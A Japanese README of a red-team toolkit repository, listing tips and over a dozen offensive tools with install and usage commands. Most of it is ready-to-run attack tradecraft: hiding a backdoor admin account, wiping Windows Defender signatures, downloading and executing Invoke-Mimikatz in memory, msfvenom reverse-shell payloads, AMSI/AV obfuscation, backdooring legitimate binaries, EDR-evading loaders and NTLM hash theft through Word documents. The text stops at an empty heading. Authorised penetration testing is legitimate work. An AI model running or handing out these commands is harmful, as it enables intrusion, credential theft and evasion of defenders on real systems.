
複数のペンテストツールを統合したプロジェクト
このリポジトリには、レッドチーム活動に役立つ 200 以上の ツールと リソースが含まれています。
一部のツールはレッドチーム向けに特別に設計されているものもあれば、より汎用的でレッドチームのコンテキストに適応できるものもあります。
警告
このリポジトリの資料は情報提供および教育目的のみです。違法行為での使用を意図したものではありません。
注記
矢印でツールリストの見出しを非表示にします。
🔙 をクリックするとリストに戻ります。
git submodule update --init --recursive
### 新しいプロジェクトを追加```bash
git submodule add https://github.com/example.git
docs: https://git-scm.com/book/en/v2/Git-Tools-Submodules
レッドチームのヒント集から学びましょう。これらのヒントは、レッドチームの能力を向上させるための戦術、ツール、方法論を網羅しています。
注意: 現在、ほぼすべてのヒントは @Alh4zr3d からのものです。彼は優れたレッドチームのヒントを投稿しています!
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /t REG_DWORD /v alh4zr3d /d 0 /f
**Description:** _'アカウント作成はブルーチームを回避する際にリスクが伴いますが、ローカル管理者を作成する際にはレジストリで可愛い魔法を使って隠しましょう。'_
**Credit:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)
**Link:** [Twitter](https://twitter.com/Alh4zr3d/status/1612913838999113728)
### [🔙](#tool-list)シグネチャを削除してWindows Defenderを無力化する```bash
"%Program Files%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
説明: '少し乱雑ですが、Windows Defenderが大きな頭痛の種になっているなら、無効にする(ユーザーに警告が表示される)代わりに、すべての署名を削除して無力化するべきです。'
クレジット: @Alh4zr3d
リンク: Twitter
reg add HKLM\System\CurrentControlSet\Control\TerminalServer /v fSingleSessionPerUser /d 0 /f
**説明:** _'RDPなどでホストにログインしたいが、ユーザーがアクティブなセッションを持っている場合があります。ユーザーごとに複数のセッションを有効にします。'_
**クレジット:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)
**リンク:** [Twitter](https://twitter.com/Alh4zr3d/status/1609954528425558016)
### [🔙](#tool-list)Sysinternals PsExec.exe ローカル代替```bash
wmic.exe /node:10.1.1.1 /user:username /password:pass process call create cmd.exe /c " command "
説明: 'Sysinternals PsExec.exeをアップロードして横方向の移動を行うのに疲れていませんか?Windowsにはプリインストールされたより良い代替手段があります。代わりにこれを試してみてください。'
クレジット: @GuhnooPlusLinux
リンク: Twitter
0..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect(<tgt_ip>,$)) "Port $ open"} 2>$null
**説明:** _'可能な限り、ツールをマシンにアップロードせずに現地のリソースを活用すべきです(多くの理由から)。PowerShell/.NETが役立ちます。例: PowerShellを使った簡単なポートスキャナー。'_
**クレジット:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)
**リンク:** [Twitter](https://twitter.com/Alh4zr3d/status/1605060950339588096)
### [🔙](#tool-list)プロキシ対応 PowerShell DownloadString```bash
$w=(New-Object Net.WebClient);$w.Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;IEX $w.DownloadString("<url>")
説明: '最近、ほとんどの大規模組織はWebプロキシを使用しています。標準のPowerShellダウンロードクラドルはプロキシに対応していません。これを使用してください。'
クレジット: @Alh4zr3d
リンク: Twitter
type "C:\Users%USERNAME%\AppData\Local\Google\Chrome\User Data\Default\Bookmarks.bak" | findstr /c "name url" | findstr /v "type"
**説明:** _「ユーザーのブックマークだけで驚くほど多くの情報が見つかるものです。例えば、彼らがアクセスできる内部エンドポイントなど。」_
**クレジット:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)
**リンク:** [Twitter](https://twitter.com/Alh4zr3d/status/1595488676389171200)
### [🔙](#tool-list)列挙のためにDNSレコードを照会する```bash
Get-DnsRecord -RecordType A -ZoneName FQDN -Server <server hostname>
説明: '列挙はゲームの95%を占める。しかし、環境を評価するために大量のスキャンを起動するのは非常に騒がしい。なぜDC/DNSサーバーにすべてのDNSレコードを問い合わせないのか?'
クレジット: @Alh4zr3d
リンク: Twitter
Get-CIMInstance -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$.StartMode -eq "Auto" -and $.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name
**説明:** _'PowerUpを使わない引用符なしサービスパスの検出'_
**クレジット:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)
**リンク:** [Twitter](https://twitter.com/Alh4zr3d/status/1579254955554136064)
### [🔙](#tool-list)無効化されたコマンドプロンプトを/kでバイパスする```bash
# Win+R (To bring up Run Box)
cmd.exe /k "whoami"
説明: 「このコマンド プロンプトは管理者により無効にされています...」は、通常キオスクPCなどの環境で見られます。簡単なハッキング的な回避策として、Windowsのファイル名を指定して実行ボックスで /k を使用することです。これによりコマンドが実行され、その後制限メッセージが表示され、コマンド実行が可能になります。
クレジット: Martin Sohn Christensen
リンク: ブログ
(new-object net.webclient).downloadstring('https://raw.githubusercontent[.]com/BC-SECURITY/Empire/main/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1')|IEX;inv
**説明:** _'Windows Defenderがmimikatz.exeを削除するのにうんざりしていませんか?代わりにこれを試してみてください。'_
**クレジット:** [@GuhnooPlusLinux](https://twitter.com/GuhnooPlusLinux)
**リンク:** [Twitter](https://twitter.com/GuhnooPlusLinux/status/1605629049660809216)
### [🔙](#tool-list)仮想マシン内にいるかどうかを確認する```bash
reg query HKLM\SYSTEM /s | findstr /S "VirtualBox VBOX VMWare"
説明: '仮想マシン内にいるかどうかを知りたいですか?レジストリキーを照会して確認してください!!! 結果が表示されれば、仮想マシン内にいることになります。'
クレジット: @dmcxblue
リンク: Twitter
(Get-AppLockerPolicy -Local).RuleCollections
Get-ChildItem -Path HKLM:Software\Policies\Microsoft\Windows\SrpV2 -Recurse
reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\SrpV2\Exe\
**説明:** _'AppLockerは厄介な存在になることがあります。どれほど厄介か確認するために列挙しましょう'_
**クレジット:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)
**リンク:** [Twitter](https://twitter.com/alh4zr3d/status/1614706476412698624)
# 偵察
### [🔙](#tool-list)crt.sh -> httprobe -> EyeWitness
以下のようなbashのワンライナーを作成しました:
- 証明書の関連付けからサブドメインのリストを受動的に収集します([crt.sh](https://crt.sh/))
- 各サブドメインに能動的にリクエストを送信し、その存在を確認します([httprobe](https://github.com/tomnomnom/httprobe))
- 各サブドメインを能動的にスクリーンショットし、手動レビューに備えます([EyeWitness](https://github.com/FortyNorthSecurity/EyeWitness))
**使い方:**```bash
domain=DOMAIN_COM;rand=$RANDOM;curl -fsSL "https://crt.sh/?q=${domain}" | pup 'td text{}' | grep "${domain}" | sort -n | uniq | httprobe > /tmp/enum_tmp_${rand}.txt; python3 /usr/share/eyewitness/EyeWitness.py -f /tmp/enum_tmp_${rand}.txt --web
_注: httprobe、pup、EyeWitness がインストールされている必要があり、'DOMAIN_COM' を対象ドメインに変更してください。複数の対象ルートドメインがある場合、このスクリプトをターミナルウィンドウで同時に実行できます。


ページ上のすべてのウェブページエンドポイントリンクを抽出するJavaScriptブックマークレットです。
作成者: @renniepak。このJavaScriptコードスニペットは、現在のウェブページのDOMから、埋め込まれたすべての外部スクリプトソースを含むすべてのエンドポイント(/で始まる)を抽出するために使用できます。```javascript
javascript: (function () {
var scripts = document.getElementsByTagName("script"),
regex = /(?<=("|'|`))/[a-zA-Z0-9_?&=/-#.]*(?=("|'|`))/g;
const results = new Set();
for (var i = 0; i < scripts.length; i++) {
var t = scripts[i].src;
"" != t &&
fetch(t)
.then(function (t) {
return t.text();
})
.then(function (t) {
var e = t.matchAll(regex);
for (let r of e) results.add(r[0]);
})
.catch(function (t) {
console.log("An error occurred: ", t);
});
}
var pageContent = document.documentElement.outerHTML,
matches = pageContent.matchAll(regex);
for (const match of matches) results.add(match[0]);
function writeResults() {
results.forEach(function (t) {
document.write(t + "
");
});
}
setTimeout(writeResults, 3e3);
})();
**使用方法(ブックマークレット)**
ブックマークレットを作成します...
- `ブックマークバーを右クリック`
- `「ページを追加」をクリック`
- `上記のJavaScriptを「URL」ボックスに貼り付け`
- `「保存」をクリック`
...その後、ブラウザで被害者ページにアクセスし、ブックマークレットをクリックします。

**使用方法(コンソール)**
上記のJavaScriptをコンソールウィンドウ`F12`に貼り付け、Enterキーを押します。

### [🔙](#tool-list)[nuclei](https://github.com/projectdiscovery/nuclei)
特定の脆弱性を検索するために.yamlテンプレートを使用する高速な脆弱性スキャナー。
**インストール:**```bash
go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest
使用方法:```bash cat domains.txt | nuclei -t /PATH/nuclei-templates/

### [🔙](#tool-list)[nuclei-templates](https://github.com/projectdiscovery/nuclei-templates.git)
<h1 align="center">
Nuclei Templates
</h1>
<h4 align="center">nucleiエンジン向けにコミュニティが厳選したテンプレートリストで、アプリケーションのセキュリティ脆弱性を発見します。</h4>
<p align="center">
<a href="https://github.com/projectdiscovery/nuclei-templates/issues"><img src="https://img.shields.io/badge/contributions-welcome-brightgreen.svg?style=flat"></a>
<a href="https://github.com/projectdiscovery/nuclei-templates/releases"><img src="https://img.shields.io/github/release/projectdiscovery/nuclei-templates"></a>
<a href="https://twitter.com/pdnuclei"><img src="https://img.shields.io/twitter/follow/pdnuclei.svg?logo=twitter"></a>
<a href="https://discord.gg/projectdiscovery"><img src="https://img.shields.io/discord/695645237418131507.svg?logo=discord"></a>
</p>
<p align="center">
<a href="https://nuclei.projectdiscovery.io/templating-guide/">ドキュメント</a> •
<a href="#-contributions">貢献</a> •
<a href="#-discussion">ディスカッション</a> •
<a href="#-community">コミュニティ</a> •
<a href="https://nuclei.projectdiscovery.io/faq/templates/">よくある質問</a> •
<a href="https://discord.gg/projectdiscovery">DCに参加</a>
</p>
---
テンプレートは、実際のスキャンエンジンを動かす [nuclei scanner](https://github.com/projectdiscovery/nuclei) の中核です。このリポジトリは、私たちのチームが提供するものだけでなく、コミュニティから提供されたスキャナー用のさまざまなテンプレートを保存・管理しています。**プルリクエスト** または [Github issues](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) を通じてテンプレートを送信し、リストを充実させることにご協力いただければ幸いです。
## Nuclei Templates 概要
nucleiテンプレートプロジェクトの概要です。ユニークなタグ、作成者、ディレクトリ、深刻度、テンプレートの種類の統計情報が含まれます。以下の表は、各マトリックスのトップ10の統計情報を示しています。拡張版は[こちら](https://gitlab.com/edu0x01/hack-tools/-/blob/master/TEMPLATES-STATS.md)で、統合用の[JSON](https://gitlab.com/edu0x01/hack-tools/-/blob/master/TEMPLATES-STATS.json)形式でも利用できます。
<table>
<tr>
<td>
## Nuclei Templates トップ10統計
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
| --------- | ----- | ------------ | ----- | -------------------- | ----- | -------- | ----- | ---- | ----- |
| cve | 1855 | dhiyaneshdk | 835 | http | 5860 | info | 2857 | file | 123 |
| panel | 896 | dwisiswant0 | 794 | workflows | 190 | high | 1270 | dns | 18 |
| wordpress | 781 | daffainfo | 664 | file | 123 | medium | 1042 | | |
| exposure | 677 | pikpikcu | 353 | network | 93 | critical | 704 | | |
| wp-plugin | 672 | pdteam | 278 | dns | 18 | low | 216 | | |
| xss | 646 | pussycat0x | 240 | ssl | 12 | unknown | 26 | | |
| osint | 639 | geeknik | 220 | headless | 9 | | | | |
| tech | 602 | ricardomaia | 215 | TEMPLATES-STATS.json | 1 | | | | |
| edb | 596 | ritikchaddha | 210 | contributors.json | 1 | | | | |
| lfi | 548 | 0x_akoko | 179 | cves.json | 1 | | | | |
**404 ディレクトリ、6542 ファイル**。
</td>
</tr>
</table>
## 📖 ドキュメント
詳細なドキュメントについては、https://nuclei.projectdiscovery.io にアクセスして、新しい **カスタム** テンプレートや **独自の** テンプレートを **ビルド** してください。また、仕組みを理解するためのテンプレートセットも追加しています。
## 💪 貢献
Nuclei-templates はコミュニティからの多大な貢献によって支えられています。[テンプレートの貢献](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+)、[機能リクエスト](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+)、[バグ報告](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+)を歓迎します。

## 💬 ディスカッション
質問や疑問、議論したいアイデアがありますか?[Github discussions](https://github.com/projectdiscovery/nuclei-templates/discussions) ボードで気軽にディスカッションを開始してください。
## 👨💻 コミュニティ
活発な [Discord Community](https://discord.gg/projectdiscovery) に参加して、プロジェクトメンテナーと直接議論したり、セキュリティや自動化に関することを他の人と共有してください。また、[Twitter](https://twitter.com/pdnuclei) でフォローしていただくと、Nucleiに関するすべての最新情報を受け取れます。
<p align="center">
<a href="https://github.com/projectdiscovery/nuclei-templates/graphs/contributors">
<img src="https://contrib.rocks/image?repo=projectdiscovery/nuclei-templates&max=300">
</a>
</p>
改めて、皆様のご貢献とこのコミュニティを活気づけていただきありがとうございます。:heart:
### [🔙](#tool-list)[certSniff](https://github.com/A-poc/certSniff)
certSniff は、Pythonで作成されたCertificate Transparencyログのキーワードウォッチャーです。certstreamライブラリを使用して、ファイルで定義されたキーワードを含む証明書作成ログを監視します。
標的ドメインに関連するいくつかのキーワードを設定して実行すると、証明書の作成が記録され、これまで知らなかったドメインを発見できる可能性があります。
**インストール:**```bash
git clone https://github.com/A-poc/certSniff;cd certSniff/;pip install -r requirements.txt
使用方法:```python python3 certSniff.py -f example.txt

### [🔙](#tool-list)[gobuster](https://www.kali.org/tools/gobuster/)
被害者サイトのファイル/フォルダパスをブルートフォースするための便利なツール。
**インストール:**```bash
sudo apt install gobuster
使用方法:```bash gobuster dir -u "https://google.com" -w /usr/share/wordlists/dirb/big.txt --wildcard -b 301,401,403,404,500 -t 20

### [🔙](#tool-list)[feroxbuster](https://github.com/epi052/feroxbuster)
強制ブラウジング(Forced Browsing)攻撃を実行するために設計されたツールです。この攻撃の目的は、Webアプリケーションから参照されていないものの、攻撃者がアクセス可能なリソースを列挙し、アクセスすることです。
Feroxbusterは、ブルートフォースとワードリストを組み合わせて、ターゲットディレクトリ内のリンクされていないコンテンツを検索します。これらのリソースには、ソースコード、認証情報、内部ネットワークアドレスなど、Webアプリケーションや運用システムに関する機密情報が保存されている可能性があります。
**インストール: (Kali)**```bash
sudo apt update && sudo apt install -y feroxbuster
インストール: (Mac)```bash curl -sL https://raw.githubusercontent.com/epi052/feroxbuster/master/install-nix.sh | bash
**インストール: (Windows)**```bash
Invoke-WebRequest https://github.com/epi052/feroxbuster/releases/latest/download/x86_64-windows-feroxbuster.exe.zip -OutFile feroxbuster.zip
Expand-Archive .\feroxbuster.zip
.\feroxbuster\feroxbuster.exe -V
完全なインストール手順については、こちらを参照してください。
使用方法:```bash
./feroxbuster -u http://127.1 -x pdf -x js,html -x php txt json,docx
./feroxbuster -u http://127.1 -H Accept:application/json "Authorization: Bearer {token}"
cat targets | ./feroxbuster --stdin --silent -s 200 301 302 --redirects -x js | fff -s 200 -o js-files
./feroxbuster -u http://127.1 --insecure --proxy http://127.0.0.1:8080
完全な使用例は[こちら](https://epi052.github.io/feroxbuster-docs/docs/examples/)にあります。

_画像は https://raw.githubusercontent.com/epi052/feroxbuster/main/img/demo.gif から使用されています_
### [🔙](#tool-list)[CloudBrute](https://github.com/0xsha/CloudBrute)
トップクラウドプロバイダー(Amazon、Google、Microsoft、DigitalOcean、Alibaba、Vultr、Linode)上で、企業(ターゲット)のインフラ、ファイル、アプリを見つけるためのツールです。
特徴:
- クラウド検出(IPINFO API およびソースコード)
- 高速(並行処理)
- クロスプラットフォーム(windows、linux、mac)
- User-Agent ランダム化
- Proxy ランダム化(HTTP、Socks5)
**インストール:**
最新の[リリース](https://github.com/0xsha/CloudBrute/releases)をあなたのシステム向けにダウンロードし、使用方法に従ってください。
**使用方法:**```bash
# Specified target, generate keywords based off 'target', 80 threads with a timeout of 10, wordlist 'storage_small.txt'
CloudBrute -d target.com -k target -m storage -t 80 -T 10 -w "./data/storage_small.txt"
# Output results to file
CloudBrute -d target.com -k keyword -m storage -t 80 -T 10 -w -c amazon -o target_output.txt

画像は https://github.com/0xsha/CloudBrute から使用
dnsrecon は DNS レコード(MX、SOA、NS、A、AAAA、SPF、TXT)を列挙するための Python ツールであり、単一のドメイン検索からピボット可能な新しい関連被害ホストを多数提供できます。
Install:```bash sudo apt install dnsrecon
**使用法:**```bash
dnsrecon -d google.com

Shodanは公開インフラストラクチャをクロールし、検索可能な形式で表示します。会社名、ドメイン名、IPアドレスを使用して、shodanを介してターゲットに関連する潜在的に脆弱なシステムを発見することが可能です。

サブドメインの列挙、DNSの列挙、WAF検出、WHOIS、ポートスキャン、Wayback Machine、メールハーベスティングのためのツール。
インストール:```bash git clone https://github.com/D3Ext/AORT; cd AORT; pip3 install -r requirements.txt
**使用方法:**```python
python3 AORT.py -d google.com

ドメインがスプーフィング可能かどうかをチェックするプログラムです。このプログラムは、SPFおよびDMARCレコードをチェックし、スプーフィングを許す脆弱な設定を検出します。さらに、SPF/DKIMメールの失敗時にメールやHTTPリクエストを送信するDMARC設定がドメインに存在する場合に警告を発します。
以下の条件のいずれかを満たす場合、ドメインはスプーフィング可能です。
~allまたは-allを指定していないp=noneに設定されている、または存在しないインストール:```bash git clone https://github.com/BishopFox/spoofcheck; cd spoofcheck; pip install -r requirements.txt
**使用方法:**```bash
./spoofcheck.py [DOMAIN]

AWSBucketDumpは、AWS S3バケットを迅速に列挙し、興味深いファイルを探すためのツールです。サブドメインのブルートフォースツールに似ていますが、S3バケット専用に作られており、ファイルをgrepしたり、興味深いファイルをダウンロードするための追加機能も備えています。
インストール:``` git clone https://github.com/jordanpotti/AWSBucketDump; cd AWSBucketDump; pip install -r requirements.txt
**使用方法:**```
usage: AWSBucketDump.py [-h] [-D] [-t THREADS] -l HOSTLIST [-g GREPWORDS] [-m MAXSIZE]
optional arguments:
-h, --help show this help message and exit
-D Download files. This requires significant diskspace
-d If set to 1 or True, create directories for each host w/ results
-t THREADS number of threads
-l HOSTLIST
-g GREPWORDS Provide a wordlist to grep for
-m MAXSIZE Maximum file size to download.
python AWSBucketDump.py -l BucketNames.txt -g interesting_Keywords.txt -D -m 500000 -d 1
GitHubから正規表現を使って情報を収集するための便利なツール。特定のGitHubユーザーやプロジェクトを検索する機能も備えています。
インストール:``` git clone https://github.com/metac0rtex/GitHarvester; cd GitHarvester
**使い方:**```
./githarvester.py
TruffleHogは、高エントロピー文字列やパスワード、APIキーといったシークレットの存在を示す可能性のあるパターンを探すためにgitリポジトリをスキャンするツールです。TruffleHogを使用すると、リポジトリに誤ってコミット・プッシュされた可能性のある機密情報を迅速かつ簡単に見つけることができます。
インストール (バイナリ): Link
インストール (Go):``` git clone https://github.com/trufflesecurity/trufflehog.git; cd trufflehog; go install
**使い方:**```
trufflehog https://github.com/trufflesecurity/test_keys

Dismapは、アセットの発見と識別を行うツールです。web/tcp/udpなどのプロトコルやフィンガープリント情報を迅速に識別し、アセットの種類を特定できます。内部ネットワークと外部ネットワークの両方に適しています。
Dismapは完全なフィンガープリントルールベースを備えており、現在tcp/udp/tlsプロトコルのフィンガープリントと4500以上のwebフィンガープリントルールを含み、favicon、body、headerなどを識別できます。
インストール:
DismapはLinux、MacOS、Windows用のバイナリファイルです。Releaseにアクセスして、対応するバージョンをダウンロードし実行してください。```bash
chmod +x dismap-0.3-linux-amd64 ./dismap-0.3-linux-amd64 -h
dismap-0.3-windows-amd64.exe -h
**使い方:**```bash
# Scan 192.168.1.1 subnet
./dismap -i 192.168.1.1/24
# Scan, output to result.txt and json output to result.json
./dismap -i 192.168.1.1/24 -o result.txt -j result.json
# Scan, Not use ICMP/PING to detect surviving hosts, timeout 10 seconds
./dismap -i 192.168.1.1/24 --np --timeout 10
# Scan, Number of concurrent threads 1000
./dismap -i 192.168.1.1/24 -t 1000

画像の出典: https://github.com/zhzyker/dismap
WindowsおよびSambaシステムから情報を列挙するためのツールです。
これを使用して、以下のような幅広い情報を収集できます。
インストール: (Apt)```bash sudo apt install enum4linux
**インストール: (Git)**```bash
git clone https://github.com/CiscoCXSecurity/enum4linux
cd enum4linux
使用方法:```bash
enum4linux.pl -a 192.168.2.55
enum4linux.pl -U 192.168.2.55
enum4linux.pl -u administrator -p password -U 192.168.2.55
enum4linux.pl -G 192.168.2.55
enum4linux.pl -v 192.168.2.55
完全な使用情報は、こちらの[ブログ](https://labs.portcullis.co.uk/tools/enum4linux/)で確認できます。

_画像は https://allabouttesting.org/samba-enumeration-for-penetration-testing-short-tutorial/ より引用_
### [🔙](#tool-list)[skanuvaty](https://github.com/Esc4iCEscEsc/skanuvaty)
[Esc4iCEscEsc](https://github.com/Esc4iCEscEsc) 作成、Rust で書かれた、危険なほど高速な DNS/ネットワーク/ポートスキャナです。
サブドメインファイルが必要です。_例:[Sublist3r によるサブドメイン単語リスト](https://raw.githubusercontent.com/aboul3la/Sublist3r/master/subbrute/names.txt)_。
**インストール:**
最新のリリースを[こちら](https://github.com/Esc4iCEscEsc/skanuvaty/releases)からダウンロードしてください。```bash
# Install a wordlist
sudo apt install wordlists
ls /usr/share/dirb/wordlists
ls /usr/share/amass/wordlists
使用方法:```bash skanuvaty --target example.com --concurrency 16 --subdomains-file SUBDOMAIN_WORDLIST.txt

_画像提供元: https://github.com/Esc4iCEscEsc/skanuvaty_
### [🔙](#tool-list)[Metabigor](https://github.com/j3ssie/metabigor)
Metabigorはインテリジェンスツールであり、その目的はOSINTタスクなどをAPIキーなしで実行することです。
**主な機能:**
- IPアドレス、ASN、組織に関する情報の検索。
- rustscan、masscan、nmapをIP/CIDR上でより効率的に実行するためのラッパー。
- さまざまな手法(証明書、whois、Google Analyticsなど)を適用して、ターゲットに関連するドメインをさらに見つける。
- IPアドレスの概要を取得(提供: [@thebl4ckturtle](https://github.com/theblackturtle))
**インストール:**```bash
go install github.com/j3ssie/metabigor@latest
使用方法:```bash
echo "company" | metabigor net --org -o /tmp/result.txt
echo 'Target Inc' | metabigor cert --json | jq -r '.Domain' | unfurl format %r.%t | sort -u # this is old command
echo '1.2.3.4/24' | metabigor scan -o result.txt
echo 'example.com' | metabigor related -s 'whois'
echo 'https://example.com' | metabigor related -s 'google-analytic'

_画像の出典: https://github.com/j3ssie/metabigor_
### [🔙](#tool-list)[Gitrob](https://github.com/michenriksen/gitrob)
Gitrob は、Github 上の公開リポジトリにプッシュされた機密性の高いファイルを発見するためのツールです。
Gitrob は、ユーザーや組織に属するリポジトリを設定した深さまでクローンし、コミット履歴をスキャンして、機密性の高いファイルのシグネチャに一致するファイルをフラグ付けします。
検出結果は、Web インターフェースで簡単にブラウジング・分析できるように表示されます。
**注:** _Gitrob が Github API と連携するには、Github アクセストークンが必要です。[個人アクセストークンを作成](https://help.github.com/articles/creating-a-personal-access-token-for-the-command-line/)し、.bashrc などのシェル設定ファイルに環境変数として保存してください:_```bash
export GITROB_ACCESS_TOKEN=deadbeefdeadbeefdeadbeefdeadbeefdeadbeef
インストール: (Go)```bash go get github.com/michenriksen/gitrob
**インストール:(バイナリ)**
各リリースには[プリコンパイル済みバージョン](https://github.com/michenriksen/gitrob/releases)が用意されています。
**使い方:**```bash
# Run against org
gitrob {org_name}
# Saving session to a file
gitrob -save ~/gitrob-session.json acmecorp
# Loading session from a file
gitrob -load ~/gitrob-session.json

画像出典: https://www.uedbox.com/post/58828/
Gowitnessは、Golangで書かれたウェブサイトのスクリーンショットユーティリティです。Chrome Headlessを使用して、コマンドラインからWebインターフェースのスクリーンショットを生成し、結果を処理するための便利なレポートビューアが付属しています。LinuxとmacOSの両方をサポートしており、Windowsもほとんど動作します。
インストール: (Go)```bash go install github.com/sensepost/gowitness@latest
完全なインストール情報は[こちら](https://github.com/sensepost/gowitness/wiki/Installation)を参照してください。
**使用方法:**```bash
# Screenshot a single website
gowitness single https://www.google.com/
# Screenshot a cidr using 20 threads
gowitness scan --cidr 192.168.0.0/24 --threads 20
# Screenshot open http services from an namp file
gowitness nmap -f nmap.xml --open --service-contains http
# Run the report server
gowitness report serve
完全な使用方法についてはこちらを参照してください。

画像提供元: https://github.com/sensepost/gowitness
Chimeraは、AMSIやアンチウイルスソリューションを回避するために設計されたPowerShell難読化スクリプトです。AVをトリガーすることが知られている悪意のあるPS1を処理し、文字列の置換と変数の連結を使用して一般的な検知シグネチャを回避します。
インストール:```bash sudo apt-get update && sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils git sudo git clone https://github.com/tokyoneon/chimera /opt/chimera sudo chown $USER:$USER -R /opt/chimera/; cd /opt/chimera/ sudo chmod +x chimera.sh; ./chimera.sh --help
**使い方:**```bash
./chimera.sh -f shells/Invoke-PowerShellTcp.ps1 -l 3 -o /tmp/chimera.ps1 -v -t powershell,windows,\
copyright -c -i -h -s length,get-location,ascii,stop,close,getstream -b new-object,reverse,\
invoke-expression,out-string,write-error -j -g -k -r -p

Msfvenomは、多種多様な形式で様々なオペレーティングシステム用のペイロードを作成できます。また、AV回避のためのペイロード難読化もサポートしています。
リスナーの設定```shell use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST your-ip set LPORT listening-port run
#### Msfvenom コマンド
**PHP:**```bash
msfvenom -p php/meterpreter/reverse_tcp lhost =192.168.0.9 lport=1234 R
Windows:```bash msfvenom -p windows/shell/reverse_tcp LHOST= LPORT= -f exe > shell-x86.exe
**Linux:**```bash
msfvenom -p linux/x86/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf
Java:```bash msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp
**HTA:**```bash
msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f hta-psh > shell.hta

Shellterは動的シェルコードインジェクションツールであり、史上初の真に動的なPE感染型ツールです。
ネイティブWindowsアプリケーション(現在は32ビットアプリケーションのみ)にシェルコードを注入するために使用できます。
ShellterはPEファイルの元の構造を活用し、セクションのメモリアクセス権限の変更(ユーザーが希望しない限り)、RWEアクセスを持つ追加セクションの追加、AVスキャンで怪しく見えるような変更を一切適用しません。
完全なREADME情報はこちらにあります。
インストール: (Kali)```bash apt-get update apt-get install shellter
**インストール: (Windows)**
[ダウンロードページ](https://www.shellterproject.com/download/)にアクセスしてインストールしてください。
**使用方法:**
正当なバイナリを選択してバックドアを仕込み、Shellterを実行するだけです。
便利なヒントは[こちら](https://www.shellterproject.com/tipstricks/)にあります。
コミュニティの使用デモは[こちら](https://www.shellterproject.com/shellter-community-demos/)に多数あります。

_画像引用元: https://www.kali.org/tools/shellter/images/shellter.png_
### [🔙](#tool-list)[Freeze](https://github.com/optiv/Freeze)
Freezeは、EDRセキュリティコントロールを回避してシェルコードをステルスに実行するために使用されるペイロード作成ツールです。Freezeは、Userland EDRフックを除去するだけでなく、他のエンドポイント監視コントロールを回避する方法でシェルコードを実行するために、複数のテクニックを活用します。
**インストール:**```bash
git clone https://github.com/optiv/Freeze
cd Freeze
go build Freeze.go
使用方法:``` -I string Path to the raw 64-bit shellcode. -O string Name of output file (e.g. loader.exe or loader.dll). Depending on what file extension defined will determine if Freeze makes a dll or exe. -console Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature. -encrypt Encrypts the shellcode using AES 256 encryption -export string For DLL Loaders Only - Specify a specific Export function for a loader to have. -process string The name of process to spawn. This process has to exist in C:\Windows\System32. Example 'notepad.exe' (default "notepad.exe") -sandbox Enables sandbox evasion by checking: Is Endpoint joined to a domain? Does the Endpoint have more than 2 CPUs? Does the Endpoint have more than 4 gigs of RAM? -sha256 Provides the SHA256 value of the loaders (This is useful for tracking)

_Image used from https://www.blackhatethicalhacking.com/tools/freeze/_
### [🔙](#tool-list)[WordSteal](https://github.com/0x09AL/WordSteal)
このスクリプトは、リモート画像を含むMicrosoft Word文書を作成し、リモートの被害者エンドポイントからNTMLハッシュをキャプチャできるようにします。
Microsoft Wordには、リモートの場所から画像を含める機能があります。攻撃者が制御するSMBサーバーにホストされたリモート画像も含まれます。これにより、認証された被害者がWord文書を開いて画像をレンダリングする際に送信されるNTLMハッシュを待ち受けてキャプチャする機会が得られます。
**インストール:**```
git clone https://github.com/0x09AL/WordSteal
cd WordSteal
使い方:```bash
./main.py 127.0.0.1 test.jpg 1
./main.py 127.0.0.1 test.jpg 0\n

_画像提供:https://pentestit.com/wordsteal-steal-ntlm-hashes-remotely/_
---
### [🔙](#tool-list)[Freeze.rs](https://github.com/optiv/Freeze.rs.git)
このフレームワークで使用されるテクニックについて詳しく知りたい場合は、SourceZero Blogおよび元のツールをご参照ください。
**説明:**
Freeze.rsは、EDRセキュリティ制御を回避し、シェルコードをステルスに実行するためのペイロード作成ツールです。Freeze.rsは複数の手法を利用して、ユーザーランドのEDRフックを除去するだけでなく、他のエンドポイント監視制御を回避する方法でシェルコードを実行します。
**中断状態のプロセスを作成する:**
プロセスが作成されると、最初に読み込まれるDLLはNtdll.dllです。これは、EDR DLLが読み込まれる前に発生します。つまり、EDRが読み込まれ、システムDLLのアセンブリにフックや変更を加え始めるまでに少し遅延があります。Ntdll.dll内のWindowsシステムコールを見ると、まだ何もフックされていないことがわかります。中断状態(時間的に凍結された状態)でプロセスを作成すると、Ntdll.dll以外のDLLは読み込まれていないことがわかります。また、EDR DLLが読み込まれていないため、Ntdll.dll内のシステムコールは変更されていないことがわかります。

**アドレス空間配置のランダム化(ASLR)**
